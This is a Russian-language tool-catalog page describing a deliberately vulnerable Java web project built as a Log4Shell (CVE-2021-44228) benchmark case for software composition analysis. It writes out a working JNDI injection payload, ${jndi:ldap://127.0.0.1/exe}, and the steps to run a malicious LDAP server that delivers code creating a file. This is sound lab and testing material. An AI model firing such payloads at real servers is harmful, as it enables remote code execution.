Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
l4j-tp1 — веб-проект jee с уязвимостью log4shell (CVE-2021-44228) | Kitploit
Инструменты/GitHubGitHub/scabench/l4j-tp1
Анализ уязвимостейЭксплуатацияВеб-безопасностьБезопасность Цепочки ПоставокОбучение и ОбразованиеЛаборатории и Практика
GitHubscabench/l4j-tp1

l4j-tp1

веб-проект jee с уязвимостью log4shell (CVE-2021-44228)

Репозиторий
52 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

log4shell истинно-положительный пример

Это простой веб-проект с уязвимостью log4shell. Проект определяет простой GET-сервис scabench.HelloWorldService, возвращающий строку простого текста hello world. Сервис не ожидает параметров, и если параметры обнаружены, в лог записывается ошибка.

Уязвимая зависимость: org.apache.logging.log4j:log4j-core:2.14.1, уязвимость: CVE-2021-44228.

Демонстрация уязвимости с помощью теста

Для этого требуется Unix или macOS. Этот проект легко портировать на Windows.

Предоставлен модульный тест для демонстрации уязвимости. Тесту требуется LDAP-сервер, предоставляющий уязвимый код; соответствующий исполняемый файл предоставляется проектом и определён в отдельном проекте https://github.com/jensdietrich/Log4J-RCE-Proof-Of-Concept на основе https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept. Тестовое окружение обработает запуск и остановку LDAP-сервера.

Тест создаст файл foo на основе команды, закодированной в коде LDAP-сервера, к которому подключается log4j (). Этим сервером может управлять злоумышленник.

touch foo

Чтобы запустить тест, соберите проект с помощью mvn test.

Демонстрация уязвимости при запуске приложения

  1. Запустите встроенный веб-сервер: mvn jetty:run
  2. Запустите включённый LDAP-сервер: java -jar dodgy-ldap-server.jar (уязвимый код будет загружать Java-код с этого сервера)
  3. Откройте в браузере http://localhost:8080/, на этой странице находится предварительно заполненная форма с вредоносной нагрузкой ${jndi:ldap://127.0.0.1/exe}
  4. Отправьте эту форму
  5. Это создаст файл foo на сервере

Запуск анализа состава программного обеспечения

Имеется несколько sh-скриптов для запуска различных анализов; отчёты о результатах можно найти в scan-results.

Генерация SBOM

В pom.xml есть плагин для генерации SBOM в формате CycloneDX. Для этого выполните mvn cyclonedx:makePackageBom, SBOM можно найти в target/ в форматах json и xml.

Скачать инструмент